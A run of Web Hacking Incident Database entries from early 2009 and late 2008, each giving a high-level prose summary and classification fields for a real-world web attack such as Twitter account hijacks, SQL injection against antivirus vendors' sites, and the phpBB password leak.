Entry Title: WHID 2009-32: 750 Twitter Accounts Hacked
WHID ID: 2009-32
Date Occured: 3/10/2009
Attack Method: Brute Force
Application Weakness: Insufficient Anti-automation
Outcome: Link Spam
Attacked Entity Field: Web 2.0
Attacked Entity Geography: USA
Incident Description:

Twitter reports in a blog entry that 750 accounts were hacked. The hacker posted messages linking to a porn webcam. While Twitter did not disclose how the attack was carried out, the suggested remediation hints that the account passwords were guessed, probably using a brute force attack.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked: Password
Number of Records: 750
Additional Link:
Entry Title: WHID 2009-31: Double Clickjacking Worm on Twitter
WHID ID: 2009-31
Date Occured: 2/12/2009
Attack Method: Worm
Application Weakness: Insufficient Process Validation
Outcome: Defacement
Attacked Entity Field: Web 2.0
Attacked Entity Geography: US
Incident Description:

Twitter is certainly bypassing Facebook as the most popular site out there, at least when it comes to security incidents.This time somebody decided abuse Twitter to demonstrate Clickjacking, an attack that RSname and Jeremiah Grossman re-christened in the OWASP conference in New York in September.

A well placed button labeled "don't click" make people click on it actually sending a Twitter message. Sunlight labs have a very interesting report showing the rate of propagation of the worm.

Cnet reports the worm spread on Feb 12th in two pulses. After the Twitter people closed the loophole the 1st time, somebody bypassed the patch to restart the worm spread out.

Chriss Shiflett provides a very good technical analysis of the worm.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-30: Sage SaaS Withdrawn Due to Security Flaws
WHID ID: 2009-30
Date Occured: 1/21/2009
Attack Method: Insufficient Authentication
Application Weakness: Insufficient Authentication
Outcome: Monetary Loss
Attacked Entity Field: Technology
Attacked Entity Geography: UK
Incident Description:

While we have no public record of an exploit in this case, it seems that the mare discovery of vulnerabilities in sage new SaaS (software as a service) offering created so much damage to classify it as an incident.

Sage is the leading provider of accounting software in the UK and it was about to launch a trendy small business SaaS offering. However as ZDnet reports, serious security flaws were discovered in the public beta and the company has to call off the launch. Who discovered the issues? naturally the competition. Duane Jackson, the CEO of a tiny rival company reported them on his blog


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology: Sage
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-29: FBI & Secret Service warn of a sophisticated HSM attack
WHID ID: 2009-29
Date Occured: 2/25/2009
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Monetary Loss
Attacked Entity Field: Finance
Attacked Entity Geography: USA
Incident Description:

A very interesting report by the FBI together with the US Secret service outlines a scheme exploiting SQL injection to steal credit card information from financial institutes. The attack involves directly attacking HSMs, the banks key vaults in charge of verifying ATM PINs in order to brute force PIN numbers.

The report is unique in describing an attack on financial services. Such attacks are know to happen but are seldom reported, certainly not with the amount of details in this report. However, the report does not indicate which incident it is based on. Is the close proximity of the report release to the Heartland incident just a coincidence?

Getting to this report took some effort and the only non blogshpere copy we found is on the Visa web site. If you know anything about this incident, please help us complete the information by leaving a comment on contacting us.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link: http://usa.visa.com/download/merchants/20090212-usss_fbi_advisory.pdf
Entry Title: WHID 2009-28: Serious Leakage on Mac clone Maker's site
WHID ID: 2009-28
Date Occured: 2/11/2009
Attack Method: Misconfiguration
Application Weakness: Application Misconfiguration
Outcome: Leakage of Information
Attacked Entity Field: Retail
Attacked Entity Geography: USA
Incident Description:

The Register reports that the online shop of Psystar, a maker of Mac compatible equipment is heavily leaking technical information that can be expoited to hack the site.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-27: Panasonic Products for Cheap
WHID ID: 2009-27
Date Occured: 2/14/2009
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Monetary Loss
Attacked Entity Field: Retail
Attacked Entity Geography: UK
Incident Description:

A report suggests that the UK retail site of the electronic equipment giant Panasonic was hacked and prices of products where set to pennies. Since the incident followed a layoff of 15,000 employees, it is assumed to be a disgruntled employees doing.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-26: F-Secure Joins The Breached AV Vendors Club
WHID ID: 2009-26
Date Occured: 2/11/2009
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Technology
Attacked Entity Geography: Finland
Incident Description:

It wasn't surprising that after attacking a Kaspereski and a BitDefender web sites, Uno, the Romanian hacker, would continue to strike anti-virus vendors. This time he found a vulnerability in the web site of Finish AV vendor F-Secure. Somewhat less severe than the others, the vulnerability enabled the hacker only to access virus statistics.

As usual, the marketing department response is amazing, mentioning that "the problem with its site was due to a bug in a Web application and not related to an unpatched system". Does that make it better?

Frankly, I don't envy the marketing department role. The company, any company for that matter, is spending too little on web application security, sites are taken down daily, and the marketing people are send to fend off the public. They must have a thick skin to survive in marketing.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography: Romania
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-25: Zone-H defaced
WHID ID: 2009-25
Date Occured: 2/13/2009
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Defacement
Attacked Entity Field: Media
Attacked Entity Geography:
Incident Description:

Zone-H DefacedWhenever a defacement appears in WHID we need to explain why. After all isn't Zone-H a better repository of simple defacement. Well, yes, but according to this report by The Register this time it was Zone-H which was defaced. The defaced site seen on the right, is available here. I am sure it is just a matter of time before we add a WHID defacement to WHID...

The Register article is interesting due to another perspective: when discussing the future of Zone-H, John Leyden writes:

But in an age where SQL injection assaults against legitimate sites are used to run drive-by download attacks without leaving any obvious signs of attack, perhaps the recording of blatant web graffiti attacks is no longer as relevant as it once was

We at the Web Hacking Incident Database try to provide the answer for this new age. I hope we help.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-24: New Phishing Attacks Combine Wildcard DNS and XSS
WHID ID: 2009-24
Date Occured: 2/10/2009
Attack Method: DNS Hijacking
Application Weakness: Improper Output Handling
Outcome: Phishing
Attacked Entity Field: Various
Attacked Entity Geography: Various
Incident Description:

Netcraft, one of the leading authorities on phising research, reports a Phishing scam that involves XSS.

The scam exploits an XSS vulnerability in iRedirector, a software used to map sub-domains into paths on the site, in order to hijack domains and use them as Phishing targets. Since iRedirector enables virtually any sub domain to be defined, the attacker can now create an endless number of combinations of domain names built to fool users and web filters alike.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology: iRedorector
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-23: Miley Cyrus Twitter Account Hit By Sex-Obsessed Hacker
WHID ID: 2009-23
Date Occured: 2/17/2009
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Leakage of Information
Attacked Entity Field: Web 2.0
Attacked Entity Geography: USA
Incident Description:

It is Twitter again, it is a celebrity again. Why don't they keep their password to themselves. This incident is even uglier as the attacker posted obscene content on the Twitter account of the 16 years old actress Miley Cyrus. This is not the first attack targeting Miley Cyrus. As reported by WHID, her personal G-mail account was hacked last year and personal pictures were stolen and published online.

We assume that he just guessed the password. Was it a trivial one? did he find a way to brute force it? Or was it something entirely different like yet another Twitter CSRF bug? time will tell.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-22: Federal Travel Booking Site Spreads Malware (Updated)
WHID ID: 2009-22
Date Occured: 2/11/2009
Attack Method: Insufficient Authentication
Application Weakness: Insufficient Authentication
Outcome: Planting of Malware
Attacked Entity Field: Retail
Attacked Entity Geography: USA
Incident Description:

Updated (Feb 22nd 2009) - the Washington Post updates that the hack exploited a problem with the default configuration of the authentication module used for authenticating remote administrators. As a result we categorized this incident under "insufficient authentication" and "misconfiguration".


Whenever we include a site inflicted with malware in WHID we need to explain why this one is worthy of WHID, after hundreds of thousands of web sites are planted with malware annually.

The Washington Post report about govtrip.com spreading malware is unique because this is an official US General Services Administration (GSA)  web site and many US federal departments employees are required to reserve travel through it. In addition, the site is run by a major defense contractor, Northrop Grumman, who you would think would know better. How secure are their defense projects when it comes to application security?


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-21: This Time Uno is after the Herald Tribute
WHID ID: 2009-21
Date Occured: 2/17/2009
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Media
Attacked Entity Geography: USA
Incident Description:

I must admit that Uno, the Romanian hacker behind a series of intrusions in recent days is a bit of a cheat for the Web Hacking Incident Database. We usually do not report vulnerabilities that where not exploited. While we understand their importance, they do not fall under the criteria set for WHID. For now we list them in a separate page, waiting for a place to be files in.

Uno presents a dilemma: he finds a vulnerability, exploits it to a limit and publish the results. Therefore the incident does not have a sizable outcome and not damage is done, but nevertheless it is interesting. We are not the only one to note that. Kasperski stressed the point the no data was actually compromised in their response to the event. So should we add it to WHID as an incident? should we skip it as just a vulnerability? for now we put them in.

So what is Uno's mischeif this time? This time it is the International Herald Tribune Uno is after. The impact of this attack, if carried out by a malicious hacker might have been profound as it seems that Uno got access to user name and passwords of editors and contributors, posibily enabling a malicious hacker to publish information on their behalf on this very prestigious newspaper.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography: Romania
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-20: BitDefender joins Kasperski on the Breached side
WHID ID: 2009-20
Date Occured: 2/9/2009
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Technology
Attacked Entity Geography:
Incident Description:

Uno, the Romanian hacker responsible for penetrating the Kasperski web site, reported repeating the trick also on the web site of the Polish distributor of BitDefender, another anti-virus software vendor.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography: Romania
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-19: Kaspersky site breached using SQL injection, sensitive data exposed (Updated)
WHID ID: 2008-19
Date Occured: 2/7/2009
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Technology
Attacked Entity Geography:
Incident Description:

Update (Feb 22nd 2009) - We were probably not the only ones not satisfied with Kasperski official press release on the subject. An interesting report on Kasperski viruslist blog by a person on the investigating team provides answers: the data was neither secured well nor the hacker incapable. The hacker made a mistake in his attack vector and decided to pursue no further. The data was available for any hacker who was really after it.

I must tkae my hat off to Kasperski for this frank analysis, which is very uncommon to companies who were breached and can really help to highlight the importance of application security.


Update (Feb 13th 2009) - Kasperski hired David Litchfield, a well known database security expert, to analyze the incident. In their response, Ksaperski point that no sensitive data was actually compromised to the event. The report points that the hacker and others following his hints did try to access sensitive data but did not succeed. The carefully worded report does leave many questions open:

  • Was the data secured well, or were the hackers who tried to access it just not capable?
  • Was no data vulnerable or just "sensitive data" and if so what is the data that was exposed?
  • Did the investigation go back to check that no one hacked the system prior to the published incident, potentially abusing it and avoiding publication?

A researcher found and exploited a serious SQL injection vulnerability in US web site of Kasperski, an anti-virus software vendor, exposing the full customers database. Well, the full database actually as the list of tables exposed proves. Apparently, the vulnerability existed for some time and the researched informed Kasperski about it to no avail before making it public.

This is another example of how fatal is SQL injection. SQL Injection is considered one of the more well understood attack vectors, easy to find during a security review, and therefore easy to get rid of. However one of its variants, blind SQL injection, can appear everywhere in the application and not just in key pages managing sensitive information and expose the entire database, making a review and fix of the application from it much harder.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography: Romania
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-18: phpBB web site hacked using LFI
WHID ID: 2009-18
Date Occured: 2/1/2009
Attack Method: Local File Inclusion (LFI)
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Technology
Attacked Entity Geography:
Incident Description:

phpBB was known for years as one of the most insecure software packages out there. It is responsible for one for one of the 1st application layer worm, Santy back in 2004. How ironic is that its own web site was seriously breached due to a vulnerability in another software package used...

The culprit was an LFI (Local File Inclusion) vulnerability in PHPlist, an application for managing newsletters which enables the hacker to grab phpBB users list. Another researcher claims that this is not an LFI but a super-globals-overwrite, which is still used to include files.

However, phpBB is not entirely off the hook, as the phpBB team admits. The stolen files included only hashed passwords, however phpBB 2 hash was unsalted and the hackers successfully brute forced 28,000 passwords. While phpBB 3, which is used on the phpBB site uses better password hashing, the upgrade procedure did not upgrade existing users waiting for their 1st login to upgrade. Anyone who did not log-in to the web site since the upgrade still had weakly hashed password in the database.

A very detailed report of the incident by the hacker shed light on how such hacks are carried out, including what the hacker went after and his exploitation techniques . The hacker found the exploit on milw0rm, a well known exploit repository, showing that public disclosure of vulnerabilities has its price, especially when it precedes the release if the patch.

A copy of the report in case the original disappears can be found here.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked: Password
Number of Records: 28000
Additional Link:
Entry Title: WHID 2009-17: Passwords are optional at SpeedDate
WHID ID: 2009-17
Date Occured: 2/3/2009
Attack Method: Insufficient Authentication
Application Weakness: Insufficient Authentication
Outcome: Leakage of Information
Attacked Entity Field: Entertainment
Attacked Entity Geography: USA
Incident Description:

TechCrunch reports that for a short period of time, SpeedDate, an online dating service did not require a password. If you knew someone's user name you could login. Talking about "lack of sufficient authentication controls..."


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-16: Primary schools hit by smut hack
WHID ID: 2009-16
Date Occured: 1/30/2009
Attack Method: Known Vulnerability
Application Weakness: Application Misconfiguration
Outcome: Defacement
Attacked Entity Field: Education
Attacked Entity Geography: UK
Incident Description:

Not all defacement are created equal. I have a second grader who has just started to use her school's web site so this defacement of 20 primary school web sites with porn hit me deep inside. We do so much to screen our young ones from the sleazy world outside, and getting it in the school's web site is just unimaginable. Just thinking about the questions I would be asked if my daughter would get such pages.

The incident also highlights the total breakup of cyber security. The incident is blamed on an unpatched version of Moodle, an open source on-line education software. The naive way ot thinking would be that schools don't have the budgets to protect their applications or even to upgrade them. However, as this incident shows, proper security is fundamental and a substantial part of the budget should be allocated to it, even it means we spend less on the application features. We need to move slower but ensure security. After all, what is the value of an educational system that shows porn?

Another insight is that real time controls for protecting web applications are essential. You need a WAF. While the specific vulnerability exploited is unknown, Installing ModSecurity would have probably prevented the exploit.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology: Moodle
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-15: Kanye West has been Hacked
WHID ID: 2009-15
Date Occured: 1/23/2009
Attack Method: Insufficient Authentication
Application Weakness: Insufficient Authentication
Outcome: Disinformation
Attacked Entity Field: Entertainment
Attacked Entity Geography: USA
Incident Description:

Celebrities web presence hacking is topping 2009 incidents list, and rappers seem to lead. However this report in the Ampersand, like the Lil Kim story from the same week,is somewhat questionable. In both cases it seem that uncomfortable content was blamed on hacking.

West's story is somewhat ironic as he used his blog to remind users of the untruthfulness of his web presence.

When reviewing all the rappers incidents, my conclusion is that they are more susceptible to content spoofing because it is much easier for hackers to imitate their language and style.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-14: My.BarackObama.com Infects Visitors With Trojan
WHID ID: 2008-14
Date Occured: 1/27/2009
Attack Method: Content Spoofing
Application Weakness: Improper Output Handling
Outcome: Planting of Malware
Attacked Entity Field: Government
Attacked Entity Geography: USA
Incident Description:

Websense reports that my.barackobama.com, an open blogging service which is part of Obama's campaign web site has been used to point users to malware infecting content.

The scam is a good example of the dangers of Web 2.0 user generated content and mashups. There was no malicious code on the Obama's site, however an allowed HTML code looking like a YouTube embedded flick pointed to an external site which carried the malware.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-13: Wikipedia Biography Hacking
WHID ID: 2009-13
Date Occured: 1/27/2009
Attack Method: Content Spoofing
Application Weakness: Unknown
Outcome: Disinformation
Attacked Entity Field: Web 2.0
Attacked Entity Geography: USA
Incident Description:

This incident might have not gotten into the Web Hacking Incident Database a year ago. However a heated discussion on the Web Application Security Consortium threat classification project reminded me that content spoofing is a potent attack vector by itself, actually one of the most dangerous there.

Wiki is one of those platforms that by design allow content be changed. It is its philosophy, and Wikipedia is the premier wiki out there. It is not a surprise that it is a prime target to content spoofing, as the story about the unexpected demise of two US senators during Obama's inauguration.

You can read more about the unique security philosophy of Wikis in my recent article and presentation about the subject.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-12: Embassy of India in Spain found serving remote malware through iFrame attack
WHID ID: 2009-12
Date Occured: 1/26/2009
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Planting of Malware
Attacked Entity Field: Government
Attacked Entity Geography:
Incident Description:

Ismael Valenzuela sent us a story about yet another malware through iFrame serving site. This time it is an official one, belonging to the Indian government official branch in Spain - it's embassy.

We can hardly include every malware service site in WHID, after all there are hundred of thousands, if not millions, of those. Why pick on the Indian embassy in Spain? One good reason is that we finally got in an input from a reader and wanted to honor the event and include the incident. But there is another more important reason.

First, hacked embassy sites are becoming a major issue which points to a much larger issue: cyber crime is endangering the Internet as we know it. While we come to rely on the web to provide us with all the information and services that we need, we do not have the tools to make it a safe place, and embassy web sites are a good example.

Practically the only way to provide sufficient security to a web site is not to have it in the first place. Instead small organizations must rely on the services of huge brokers, such as Amazon, eBay or Google sites. However not everyone can use this services. Embassies are a good example as they need to be "doubly localized" for both the originating and target countries which makes it nearly impossible to create a uniform service for them. Therefore even embassies of larger countries need to create small home made and insecure web sites, as they need to adjust their site content, language and site look to the local community served.

Thechnical analysis of the planted malware was done by Trend Micro.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-11: Lil Kim Facebook Hacked
WHID ID: 2009-11
Date Occured: 1/26/2009
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Disinformation
Attacked Entity Field: Entertainment
Attacked Entity Geography: USA
Incident Description:

I am not sure why rappers web presence is so often hacked. They might be the first generation of artists to use the web, brightly combining great Internet skills with technophobia which leads to basic operational errors. Or it might be the underground nature of the artists that (mis)manage their web presence by themselves.

Lil Kim is joining Soulja Boy in being cyber abuse, or so she claims, saying that a blog entry calling Naturi Naughton, the actress who portrays her in a new film, “tasteless and talentless.”, is a fake.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-10: MacRumorsLive feed hack
WHID ID: 2009-10
Date Occured: 1/7/2009
Attack Method: Unintentional Information Disclosure
Application Weakness: Application Misconfiguration
Outcome: Disinformation
Attacked Entity Field: Media
Attacked Entity Geography: USA
Incident Description:

It seems that if the worse thing that can happen to hackers is a real accident to Apple's CEO Steve Jobs. The number of hacks devoted to informing us about his fictitious accidents is just overwhelming. In this case AnantaSec reports a hack into Mac Rumors feed that was possible simply because a file with the administrator password was laying around accessible to anyone due to an administration error.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-9: MetaFilter suffers an SQL injection attack
WHID ID: 2009-9
Date Occured: 1/24/2009
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Planting of Malware
Attacked Entity Field: Web 2.0
Attacked Entity Geography: USA
Incident Description:

MetaFilter philosophy is that social norms and peer pressure, referred to as "self-policing", will ensure the quality of the content of the site. However is seems that this philosophy does not extend to hackers who abuse the site's software to plant Malware affecting MetaFilter users.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-8: Wired.com Image Viewer Hacked to Create Phony Steve Jobs Health Story
WHID ID: 2009-8
Date Occured: 1/22/2009
Attack Method: Content Spoofing
Application Weakness: Application Misconfiguration
Outcome: Disinformation
Attacked Entity Field: Media
Attacked Entity Geography: USA
Incident Description:

John Abell from Wired magazine often writes about Apple's CEO health. However, this report about Job suffering a cardiac arrest, was neither his nor true. The culprit was Wired public image viewing utility which lets people upload am image and than presented the image as part of the Wired web site, banner and domain included.

This is a wonderful example of a web application design flaw. There was nothing wrong with the code, however the design of the feature enabled it to be abused.

Further information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-7: China's Yeepay.com Suffers Internet Payment Hacker Attack
WHID ID: 2009-7
Date Occured: 1/19/2009
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: Finance
Attacked Entity Geography: China
Incident Description:

China retail news reports that Yeepay, a Chinese online payments provider suffered a major denial of service attack. The story seems to be big in China, but hardly made it to the west.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-6: InfoGov switch hosting due to lack of security
WHID ID: 2009-6
Date Occured: 1/16/2009
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Planting of Malware
Attacked Entity Field: Government
Attacked Entity Geography: UK
Incident Description:

This gem is taken out of a press release issued by a hosting provider. According to the press release, InfoGov, a UK provider of risk management solutions, switched hosting its sites to a new provider because the previous one did not provide adequate solution to an SQL injection attack that penetrated the site and inflicted Malware on InfoGov customers.

Probably yet another fallout from the on going Asprox attack, this incident is interesting as it emphasises the responsibility that customers expect service providers to take in protecting from web based attacks.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-5: School data hacked, grades altered
WHID ID: 2009-5
Date Occured: 1/15/2009
Attack Method: Insufficient Authentication
Application Weakness: Insufficient Authentication
Outcome: Disinformation
Attacked Entity Field: Education
Attacked Entity Geography: USA
Incident Description:

This story about student hacking a Pottsville, PA school online system and changing grades demonstrated again that password stealing is by far the most common method in which web sites are hacked.

While it is usually not considered a vulnerability in the application itself, I think that application that expose administrative or high privileges interface to the web should include authentication beyond a simple password. A school grading system is one example. The Twitter administrative interface hacked last week is another example.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-4: Twitter Personal Info CSRF
WHID ID: 2009-4
Date Occured: 1/7/2009
Attack Method: Cross Site Request Forgery (CSRF)
Application Weakness: Insufficient Process Validation
Outcome: Leakage of Information
Attacked Entity Field: Web 2.0
Attacked Entity Geography: USA
Incident Description:

Gareth Heyes (and others) reported an interesting vulnerability in Twitter last week. While his post included a proof of concept code, it does not qualify as a hack only a vulnerability disclosure and the Web Hacking Incident Database does not list vulnerabilities.

Luckily Cool Giorgio Maone decided to create his own proof of concept, run it himself and provide us with the result, enabling me to label this as a hack

By exploiting a CSRF bug in twitter (or maybe a feature?) site owners can get twitter profiles of their visitors. For Twitter this is a second this year and now the comprise 50% of the web incidents for 2009. Is this going to be the year of Web 2.0 security?

 


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography: Italy
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-3: Google Trends Falls Victim to a Stunt
WHID ID: 2009-3
Date Occured: 1/6/2009
Attack Method: Process Automation
Application Weakness: Insufficient Anti-automation
Outcome: Disinformation
Attacked Entity Field: Internet
Attacked Entity Geography: USA
Incident Description:

Someone, and not for the 1st time, succeeded in manipulating Google Trends, a Google service listing popular search terms. In this case the New York Time reports that a symbol at presumably denoting 9/11 reached number 2 in the list of hot Trends (see picture right).

While this may be nothing more than a joke, the capability to create a trend can have a huge and sometimes devastating effect. After all in recent months the future of big financial institutes was determined by the rumor mill.

On the technical side, insufficient anti-automation controls have been one of the more obscure and hardest to fix vulnerabilities in web applications. Starting with the Lexis-Nexis incident (WHID 2005-65), many incidents where waved off as nothing more than an automated client. However, as the incidents pile it becomes clear that it is the responsibility of the site owner to mitigate such harmful automation attacks.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-2: Twitter accounts of the famous hacked (Updated)
WHID ID: 2009-2
Date Occured: 1/5/2009
Attack Method: Insufficient Authentication
Application Weakness: Insufficient Authentication
Outcome: Defacement
Attacked Entity Field: Web 2.0
Attacked Entity Geography: USA
Incident Description:

Update (Jan 11th 2009) - The hacker bragged about the hack and revealed that it was a brute force dictionary attack against an administrator account. Twitter does not block repetitive login failures therefore enabling brute force attacks. We are still leaving the incident classification "insufficient authentication" in addition to brute force as we feel an administration interface should have additional authentication mechanism and not just a password.



Twitter announced that a hacker broke into 33 accounts including Obama's now inactive twitter. The hack is a result of a flaw in a web based support tool used by twitter, which where evidently accessible externally without proper authorization.

It is important to note that this incident is not related to Twitter phishing attack which occurred on the previous weekend.

This incident highlights the issue of public facing administration interfaces, which often combine strong functionality with lesser attention to quality and therefore security. As organizations virtualize, those interfaces become available over the Internet, often without sufficient protection.

You can read some of the funny things that the hacker published in different twitters on Read Write Web.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography: USA
Attacked System Technology: Administration Tool
Cost:
Items Leaked: Password
Number of Records: 33
Additional Link:
Entry Title: WHID 2009-1: Gaza conflict cyber war
WHID ID: 2009-1
Date Occured: 1/5/2009
Attack Method: Various
Application Weakness: Insufficient Authentication
Outcome: Downtime
Attacked Entity Field: Various
Attacked Entity Geography:
Incident Description: Update (Jan 13, 2009) - Ynet, an Israeli paper, reports that many of the sites defaced where actually DNS hijacked following a break-in to the servers of DomainTheNet, an Israeli registrar. And just like other recent DNS hijacking incidents, the fault was lack of sufficient authentications and the hackers got hold of passwords to the administration system. Update (Jan 10, 2009) - Zone-H reports that in addition to Israeli sites, Turkish hackers are also targetting USA and Nato web sites using SQL injection. The war in Gaza, like most modern wars, moved immediately to cyberspace. Islamic and Arab groups all over the world are using the Internet to retaliate against Israeli web sites. Some of the reported incidents are: Israeli bank site hacked by an Islamic group Hundreds of Israeli web sites hacked in 'Propaganda War' Like every war, this one is not one sided. Interestingly enough, since this is a war between a country and a Guerrilla organization, and the cyber war which focus on mostly on conquering the minds of people is shaped similarly. The Israeli cyber war activity is mostly funneled through legal channels rather than hacking, as described by Wired. However, unlike the physical war in which only the Israeli military is conducting, in cyberspace Israelis join by themselves the hacking war. Artuz 7, an Israeli media site, reports that a group of students released a tool that perform distributed denial of service attacks against Hamas web sites. The students site itself provides news alerts about the cyber war between Israel and the Hamas. Editor's notes: (1) As a policy, we decided to report each such conflict as a single incident, unless some hack is especiallly of interest. The author of this incident is Israeli.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.ynetnews.com/articles/0,7340,L-3649281,00.html
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-60: Miley Cyrus Pictures Leaked Due to a Web Hack (Updated)
WHID ID: 2008-60
Date Occured: 10/20/2008
Attack Method: Administration Error
Application Weakness: Application Misconfiguration
Outcome: Leakage of Information
Attacked Entity Field: Web 2.0
Attacked Entity Geography:
Incident Description:

Update (April 19th 2009) - E!News provides additional interesting details about Josh Holly, the hacker who carried out the attack. They actually took the trouble to go to Holly's hometown and and ask people about him,providing an interesting insight into the celebs hacking phenomena.


Celebs are fast becoming a prime hacking target. Miley Cyrus already made her debut at WHID when her Twitter account was raided. But it seems that this was not her first cyber incident for her. As reported by Wired, late last year a hacker named Josh Holly published private photos of Ms. Cyrus stolen from her G-mail account.

The hack was a relatively sophisticated one and a very good example of the risks of Web 2.0. Holly penetrated a MySpace administrator using social engineering. Using the account he gained access to a list of passwords which MySpace stored in an unencrypted form. Unbelievable. Since most of us use the same password for multiple services, Holly used Cyrus' MySpace password on her G-mail account gaining access and retrieving the photographs.

